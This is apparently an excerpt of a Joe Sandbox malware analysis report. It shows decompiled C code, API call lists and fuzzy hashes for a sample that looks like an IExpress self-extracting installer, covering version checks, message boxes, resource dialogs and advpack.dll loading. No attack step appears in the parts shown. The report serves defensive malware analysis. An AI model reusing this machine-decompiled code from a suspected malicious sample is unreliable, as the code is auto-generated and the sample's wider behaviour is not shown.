                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                      • String ID: wininit.ini
                                                                                                                                                                                                      • API String ID: 3273605193-4206010578
                                                                                                                                                                                                      • Opcode ID: 15f701aa2068b3f558a1838ba810fba21de06c4a8811cf5848c8fda674ed63f1
                                                                                                                                                                                                      • Instruction ID: 0dfc77cc2df6ec26bb166dec365458010e4ef1bca134b38bf9a8c35283ae67b1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 15f701aa2068b3f558a1838ba810fba21de06c4a8811cf5848c8fda674ed63f1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4501F5326001686BC7319B669C4DEDFBB7CDB82760F010364FA49D71D0DE749E41CA91
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 75%
                                                                                                                                                                                                      			E003E36EE(CHAR* __ecx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                      				signed int _v420;
                                                                                                                                                                                                      				signed int _v424;
                                                                                                                                                                                                      				CHAR* _v428;
                                                                                                                                                                                                      				CHAR* _v432;
                                                                                                                                                                                                      				signed int _v436;
                                                                                                                                                                                                      				CHAR* _v440;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t72;
                                                                                                                                                                                                      				CHAR* _t77;
                                                                                                                                                                                                      				CHAR* _t91;
                                                                                                                                                                                                      				CHAR* _t94;
                                                                                                                                                                                                      				int _t97;
                                                                                                                                                                                                      				CHAR* _t98;
                                                                                                                                                                                                      				signed char _t99;
                                                                                                                                                                                                      				CHAR* _t104;
                                                                                                                                                                                                      				signed short _t107;
                                                                                                                                                                                                      				signed int _t109;
                                                                                                                                                                                                      				short _t113;
                                                                                                                                                                                                      				void* _t114;
                                                                                                                                                                                                      				signed char _t115;
                                                                                                                                                                                                      				short _t119;
                                                                                                                                                                                                      				CHAR* _t123;
                                                                                                                                                                                                      				CHAR* _t124;
                                                                                                                                                                                                      				CHAR* _t129;
                                                                                                                                                                                                      				signed int _t131;
                                                                                                                                                                                                      				signed int _t132;
                                                                                                                                                                                                      				CHAR* _t135;
                                                                                                                                                                                                      				CHAR* _t138;
                                                                                                                                                                                                      				signed int _t139;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t72 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_v8 = _t72 ^ _t139;
                                                                                                                                                                                                      				_v416.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                      				_t115 = __ecx;
                                                                                                                                                                                                      				_t135 = 0;
                                                                                                                                                                                                      				_v432 = __ecx;
                                                                                                                                                                                                      				_t138 = 0;
                                                                                                                                                                                                      				if(GetVersionExA( &_v416) != 0) {
                                                                                                                                                                                                      					_t133 = _v416.dwMajorVersion;
                                                                                                                                                                                                      					_t119 = 2;
                                                                                                                                                                                                      					_t77 = _v416.dwPlatformId - 1;
                                                                                                                                                                                                      					__eflags = _t77;
                                                                                                                                                                                                      					if(_t77 == 0) {
                                                                                                                                                                                                      						_t119 = 0;
                                                                                                                                                                                                      						__eflags = 1;
                                                                                                                                                                                                      						 *0x3e8184 = 1;
                                                                                                                                                                                                      						 *0x3e8180 = 1;
                                                                                                                                                                                                      						L13:
                                                                                                                                                                                                      						 *0x3e9a40 = _t119;
                                                                                                                                                                                                      						L14:
                                                                                                                                                                                                      						__eflags =  *0x3e8a34 - _t138; // 0x0
                                                                                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                                                                                      							goto L66;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags = _t115;
                                                                                                                                                                                                      						if(_t115 == 0) {
                                                                                                                                                                                                      							goto L66;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_v428 = _t135;
                                                                                                                                                                                                      						__eflags = _t119;
                                                                                                                                                                                                      						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                                                                                                                                                      						_t11 =  &_v420;
                                                                                                                                                                                                      						 *_t11 = _v420 & _t138;
                                                                                                                                                                                                      						__eflags =  *_t11;
                                                                                                                                                                                                      						_v440 = _t115;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_v424 = _t135 * 0x18;
                                                                                                                                                                                                      							_v436 = E003E2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                                                                                                                                                      							_t91 = E003E2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                                                                                                                                                      							_t123 = _v436;
                                                                                                                                                                                                      							_t133 = 0x54d;
                                                                                                                                                                                                      							__eflags = _t123;
                                                                                                                                                                                                      							if(_t123 < 0) {
                                                                                                                                                                                                      								L32:
                                                                                                                                                                                                      								__eflags = _v420 - 1;
                                                                                                                                                                                                      								if(_v420 == 1) {
                                                                                                                                                                                                      									_t138 = 0x54c;
                                                                                                                                                                                                      									L36:
                                                                                                                                                                                                      									__eflags = _t138;
                                                                                                                                                                                                      									if(_t138 != 0) {
                                                                                                                                                                                                      										L40:
                                                                                                                                                                                                      										__eflags = _t138 - _t133;
                                                                                                                                                                                                      										if(_t138 == _t133) {
                                                                                                                                                                                                      											L30:
                                                                                                                                                                                                      											_v420 = _v420 & 0x00000000;
                                                                                                                                                                                                      											_t115 = 0;
                                                                                                                                                                                                      											_v436 = _v436 & 0x00000000;
                                                                                                                                                                                                      											__eflags = _t138 - _t133;
                                                                                                                                                                                                      											_t133 = _v432;
                                                                                                                                                                                                      											if(__eflags != 0) {
                                                                                                                                                                                                      												_t124 = _v440;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                                                                                                                                                      												_v420 =  &_v268;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											__eflags = _t124;
                                                                                                                                                                                                      											if(_t124 == 0) {
                                                                                                                                                                                                      												_t135 = _v436;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												_t99 = _t124[0x30];
                                                                                                                                                                                                      												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                                                                                                                                                      												__eflags = _t99 & 0x00000001;
                                                                                                                                                                                                      												if((_t99 & 0x00000001) == 0) {
                                                                                                                                                                                                      													asm("sbb ebx, ebx");
                                                                                                                                                                                                      													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													_t115 = 0x104;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											__eflags =  *0x3e8a38 & 0x00000001;
                                                                                                                                                                                                      											if(( *0x3e8a38 & 0x00000001) != 0) {
                                                                                                                                                                                                      												L64:
                                                                                                                                                                                                      												_push(0);
                                                                                                                                                                                                      												_push(0x30);
                                                                                                                                                                                                      												_push(_v420);
                                                                                                                                                                                                      												_push("cent");
                                                                                                                                                                                                      												goto L65;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												__eflags = _t135;
                                                                                                                                                                                                      												if(_t135 == 0) {
                                                                                                                                                                                                      													goto L64;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												__eflags =  *_t135;
                                                                                                                                                                                                      												if( *_t135 == 0) {
                                                                                                                                                                                                      													goto L64;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												MessageBeep(0);
                                                                                                                                                                                                      												_t94 = E003E681F(_t115);
                                                                                                                                                                                                      												__eflags = _t94;
                                                                                                                                                                                                      												if(_t94 == 0) {
                                                                                                                                                                                                      													L57:
                                                                                                                                                                                                      													0x180030 = 0x30;
                                                                                                                                                                                                      													L58:
                                                                                                                                                                                                      													_t97 = MessageBoxA(0, _t135, "cent", 0x00180030 | _t115);
                                                                                                                                                                                                      													__eflags = _t115 & 0x00000004;
                                                                                                                                                                                                      													if((_t115 & 0x00000004) == 0) {
                                                                                                                                                                                                      														__eflags = _t115 & 0x00000001;
                                                                                                                                                                                                      														if((_t115 & 0x00000001) == 0) {
                                                                                                                                                                                                      															goto L66;
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      														__eflags = _t97 - 1;
                                                                                                                                                                                                      														L62:
                                                                                                                                                                                                      														if(__eflags == 0) {
                                                                                                                                                                                                      															_t138 = 0;
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      														goto L66;
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      													__eflags = _t97 - 6;
                                                                                                                                                                                                      													goto L62;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												_t98 = E003E67C9(_t124, _t124);
                                                                                                                                                                                                      												__eflags = _t98;
                                                                                                                                                                                                      												if(_t98 == 0) {
                                                                                                                                                                                                      													goto L57;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												goto L58;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										__eflags = _t138 - 0x54c;
                                                                                                                                                                                                      										if(_t138 == 0x54c) {
                                                                                                                                                                                                      											goto L30;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										__eflags = _t138;
                                                                                                                                                                                                      										if(_t138 == 0) {
                                                                                                                                                                                                      											goto L66;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_t135 = 0;
                                                                                                                                                                                                      										__eflags = 0;
                                                                                                                                                                                                      										goto L44;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									L37:
                                                                                                                                                                                                      									_t129 = _v432;
                                                                                                                                                                                                      									__eflags = _t129[0x7c];
                                                                                                                                                                                                      									if(_t129[0x7c] == 0) {
                                                                                                                                                                                                      										goto L66;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t133 =  &_v268;
                                                                                                                                                                                                      									_t104 = E003E28E8(_t129,  &_v268, _t129,  &_v428);
                                                                                                                                                                                                      									__eflags = _t104;
                                                                                                                                                                                                      									if(_t104 != 0) {
                                                                                                                                                                                                      										goto L66;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t135 = _v428;
                                                                                                                                                                                                      									_t133 = 0x54d;
                                                                                                                                                                                                      									_t138 = 0x54d;
                                                                                                                                                                                                      									goto L40;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								goto L33;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags = _t91;
                                                                                                                                                                                                      							if(_t91 > 0) {
                                                                                                                                                                                                      								goto L32;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags = _t123;
                                                                                                                                                                                                      							if(_t123 != 0) {
                                                                                                                                                                                                      								__eflags = _t91;
                                                                                                                                                                                                      								if(_t91 != 0) {
                                                                                                                                                                                                      									goto L37;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                                                                                                                                                      								L27:
                                                                                                                                                                                                      								if(__eflags <= 0) {
                                                                                                                                                                                                      									goto L37;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								L28:
                                                                                                                                                                                                      								__eflags = _t135;
                                                                                                                                                                                                      								if(_t135 == 0) {
                                                                                                                                                                                                      									goto L33;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t138 = 0x54c;
                                                                                                                                                                                                      								goto L30;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags = _t91;
                                                                                                                                                                                                      							_t107 = _v416.dwBuildNumber;
                                                                                                                                                                                                      							if(_t91 != 0) {
                                                                                                                                                                                                      								_t131 = _v424;
                                                                                                                                                                                                      								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                                                                                                                                                      								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                                                                                                                                                      									goto L37;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								goto L28;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                      							_t109 = _v424;
                                                                                                                                                                                                      							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                      							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                      								goto L28;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                      							goto L27;
                                                                                                                                                                                                      							L33:
                                                                                                                                                                                                      							_t135 =  &(_t135[1]);
                                                                                                                                                                                                      							_v428 = _t135;
                                                                                                                                                                                                      							_v420 = _t135;
                                                                                                                                                                                                      							__eflags = _t135 - 2;
                                                                                                                                                                                                      						} while (_t135 < 2);
                                                                                                                                                                                                      						goto L36;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					__eflags = _t77 == 1;
                                                                                                                                                                                                      					if(_t77 == 1) {
                                                                                                                                                                                                      						 *0x3e9a40 = _t119;
                                                                                                                                                                                                      						 *0x3e8184 = 1;
                                                                                                                                                                                                      						 *0x3e8180 = 1;
                                                                                                                                                                                                      						__eflags = _t133 - 3;
                                                                                                                                                                                                      						if(_t133 > 3) {
                                                                                                                                                                                                      							__eflags = _t133 - 5;
                                                                                                                                                                                                      							if(_t133 < 5) {
                                                                                                                                                                                                      								goto L14;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t113 = 3;
                                                                                                                                                                                                      							_t119 = _t113;
                                                                                                                                                                                                      							goto L13;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t119 = 1;
                                                                                                                                                                                                      						_t114 = 3;
                                                                                                                                                                                                      						 *0x3e9a40 = 1;
                                                                                                                                                                                                      						__eflags = _t133 - _t114;
                                                                                                                                                                                                      						if(__eflags < 0) {
                                                                                                                                                                                                      							L9:
                                                                                                                                                                                                      							 *0x3e8184 = _t135;
                                                                                                                                                                                                      							 *0x3e8180 = _t135;
                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                      						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						goto L9;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t138 = 0x4ca;
                                                                                                                                                                                                      					goto L44;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t138 = 0x4b4;
                                                                                                                                                                                                      					L44:
                                                                                                                                                                                                      					_push(_t135);
                                                                                                                                                                                                      					_push(0x10);
                                                                                                                                                                                                      					_push(_t135);
                                                                                                                                                                                                      					_push(_t135);
                                                                                                                                                                                                      					L65:
                                                                                                                                                                                                      					_t133 = _t138;
                                                                                                                                                                                                      					E003E44B9(0, _t138);
                                                                                                                                                                                                      					L66:
                                                                                                                                                                                                      					return E003E6CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}





































                                                                                                                                                                                                      0x003e3991
                                                                                                                                                                                                      0x003e3991
                                                                                                                                                                                                      0x003e398f
                                                                                                                                                                                                      0x003e39af
                                                                                                                                                                                                      0x003e39b6
                                                                                                                                                                                                      0x003e3a0f
                                                                                                                                                                                                      0x003e3a0f
                                                                                                                                                                                                      0x003e3a11
                                                                                                                                                                                                      0x003e3a13
                                                                                                                                                                                                      0x003e3a19
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e39b8
                                                                                                                                                                                                      0x003e39b8
                                                                                                                                                                                                      0x003e39ba
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e39bc
                                                                                                                                                                                                      0x003e39bf
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e39c3
                                                                                                                                                                                                      0x003e39c9
                                                                                                                                                                                                      0x003e39ce
                                                                                                                                                                                                      0x003e39d0
                                                                                                                                                                                                      0x003e39e3
                                                                                                                                                                                                      0x003e39e5
                                                                                                                                                                                                      0x003e39e6
                                                                                                                                                                                                      0x003e39f1
                                                                                                                                                                                                      0x003e39f7
                                                                                                                                                                                                      0x003e39fa
                                                                                                                                                                                                      0x003e3a01
                                                                                                                                                                                                      0x003e3a04
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3a06
                                                                                                                                                                                                      0x003e3a09
                                                                                                                                                                                                      0x003e3a09
                                                                                                                                                                                                      0x003e3a0b
                                                                                                                                                                                                      0x003e3a0b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3a09
                                                                                                                                                                                                      0x003e39fc
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e39fc
                                                                                                                                                                                                      0x003e39d3
                                                                                                                                                                                                      0x003e39d8
                                                                                                                                                                                                      0x003e39da
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e39dc
                                                                                                                                                                                                      0x003e39b6
                                                                                                                                                                                                      0x003e3955
                                                                                                                                                                                                      0x003e395b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3961
                                                                                                                                                                                                      0x003e3963
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3969
                                                                                                                                                                                                      0x003e3969
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3969
                                                                                                                                                                                                      0x003e3915
                                                                                                                                                                                                      0x003e3915
                                                                                                                                                                                                      0x003e391b
                                                                                                                                                                                                      0x003e391f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e392d
                                                                                                                                                                                                      0x003e3933
                                                                                                                                                                                                      0x003e3938
                                                                                                                                                                                                      0x003e393a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3940
                                                                                                                                                                                                      0x003e3946
                                                                                                                                                                                                      0x003e394b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e394b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e38f2
                                                                                                                                                                                                      0x003e3843
                                                                                                                                                                                                      0x003e3845
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e384b
                                                                                                                                                                                                      0x003e384d
                                                                                                                                                                                                      0x003e3883
                                                                                                                                                                                                      0x003e3885
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e389a
                                                                                                                                                                                                      0x003e389e
                                                                                                                                                                                                      0x003e389e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e38a0
                                                                                                                                                                                                      0x003e38a0
                                                                                                                                                                                                      0x003e38a2
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e38a4
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e38a4
                                                                                                                                                                                                      0x003e384f
                                                                                                                                                                                                      0x003e3851
                                                                                                                                                                                                      0x003e3857
                                                                                                                                                                                                      0x003e386e
                                                                                                                                                                                                      0x003e3877
                                                                                                                                                                                                      0x003e387b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3881
                                                                                                                                                                                                      0x003e3859
                                                                                                                                                                                                      0x003e385c
                                                                                                                                                                                                      0x003e3862
                                                                                                                                                                                                      0x003e3866
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3868
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e38f4
                                                                                                                                                                                                      0x003e38f4
                                                                                                                                                                                                      0x003e38f5
                                                                                                                                                                                                      0x003e38fb
                                                                                                                                                                                                      0x003e3901
                                                                                                                                                                                                      0x003e3901
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e390a
                                                                                                                                                                                                      0x003e374b
                                                                                                                                                                                                      0x003e374e

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 003E3723
                                                                                                                                                                                                      • MessageBeep.USER32(00000000), ref: 003E39C3
                                                                                                                                                                                                      • MessageBoxA.USER32(00000000,00000000,cent,00000030), ref: 003E39F1
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Message$BeepVersion
                                                                                                                                                                                                      • String ID: 3$cent
                                                                                                                                                                                                      • API String ID: 2519184315-3438608206
                                                                                                                                                                                                      • Opcode ID: cb29e0f5dc0b36e1baae0369148154876155e369ad5478fb91f9843368a0a4bc
                                                                                                                                                                                                      • Instruction ID: 2505d2fd4f24c56bc8d58510cd8da895d4e5f36cbcd4faf2a8a1b72580d222b2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: cb29e0f5dc0b36e1baae0369148154876155e369ad5478fb91f9843368a0a4bc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3391D271E012B49BDB778B16CD897EA77A5AF45304F1603A9E8499B2C1D7718F80CB41
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 78%
                                                                                                                                                                                                      			E003E6517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, char _a16) {
                                                                                                                                                                                                      				struct HRSRC__* _t6;
                                                                                                                                                                                                      				void* _t21;
                                                                                                                                                                                                      				struct HINSTANCE__* _t23;
                                                                                                                                                                                                      				int _t24;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t23 =  *0x3e9a3c; // 0x3e0000
                                                                                                                                                                                                      				_t6 = FindResourceA(_t23, __edx, 5);
                                                                                                                                                                                                      				if(_t6 == 0) {
                                                                                                                                                                                                      					L6:
                                                                                                                                                                                                      					E003E44B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					_t5 =  &_a16; // 0x3e2ee8
                                                                                                                                                                                                      					_t24 =  *_t5;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t21 = LoadResource(_t23, _t6);
                                                                                                                                                                                                      					if(_t21 == 0) {
                                                                                                                                                                                                      						goto L6;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						if(_a12 != 0) {
                                                                                                                                                                                                      							_push(_a12);
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                                                                                                                                                      						FreeResource(_t21);
                                                                                                                                                                                                      						if(_t24 == 0xffffffff) {
                                                                                                                                                                                                      							goto L6;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t24;
                                                                                                                                                                                                      			}








                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • FindResourceA.KERNEL32(003E0000,000007D6,00000005), ref: 003E652A
                                                                                                                                                                                                      • LoadResource.KERNEL32(003E0000,00000000,?,?,003E2EE8,00000000,003E19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 003E6538
                                                                                                                                                                                                      • DialogBoxIndirectParamA.USER32(003E0000,00000000,00000547,003E19E0,00000000), ref: 003E6557
                                                                                                                                                                                                      • FreeResource.KERNEL32(00000000,?,?,003E2EE8,00000000,003E19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 003E6560
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                      • String ID: .>
                                                                                                                                                                                                      • API String ID: 1214682469-777486363
                                                                                                                                                                                                      • Opcode ID: dce79a95776535d5fd4be20d5bf5ca8ae775f43081e06bbb041ff770e45c052d
                                                                                                                                                                                                      • Instruction ID: 2ca6b626c3f55bf767d46ef265839ff3c07415e5f6d71844c3d36ef52c06dcfa
                                                                                                                                                                                                      • Opcode Fuzzy Hash: dce79a95776535d5fd4be20d5bf5ca8ae775f43081e06bbb041ff770e45c052d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B012B722005A9BBCB225F5A9C49DBB766CEB9A3A1F010325FE01971D0D771DD108AA1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 83%
                                                                                                                                                                                                      			E003E6495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				signed int _t9;
                                                                                                                                                                                                      				signed char _t14;
                                                                                                                                                                                                      				struct HINSTANCE__* _t15;
                                                                                                                                                                                                      				void* _t18;
                                                                                                                                                                                                      				CHAR* _t26;
                                                                                                                                                                                                      				void* _t27;
                                                                                                                                                                                                      				signed int _t28;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t27 = __esi;
                                                                                                                                                                                                      				_t18 = __ebx;
                                                                                                                                                                                                      				_t9 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_v8 = _t9 ^ _t28;
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				E003E1781( &_v268, 0x104, __ecx, "C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                      				_t26 = "advpack.dll";
                                                                                                                                                                                                      				E003E658A( &_v268, 0x104, _t26);
                                                                                                                                                                                                      				_t14 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                      				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                                                                                                                                                      					_t15 = LoadLibraryA(_t26);
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E003E6CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                                                                                                                                                      			}














                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 003E64DF
                                                                                                                                                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 003E64F9
                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 003E6502
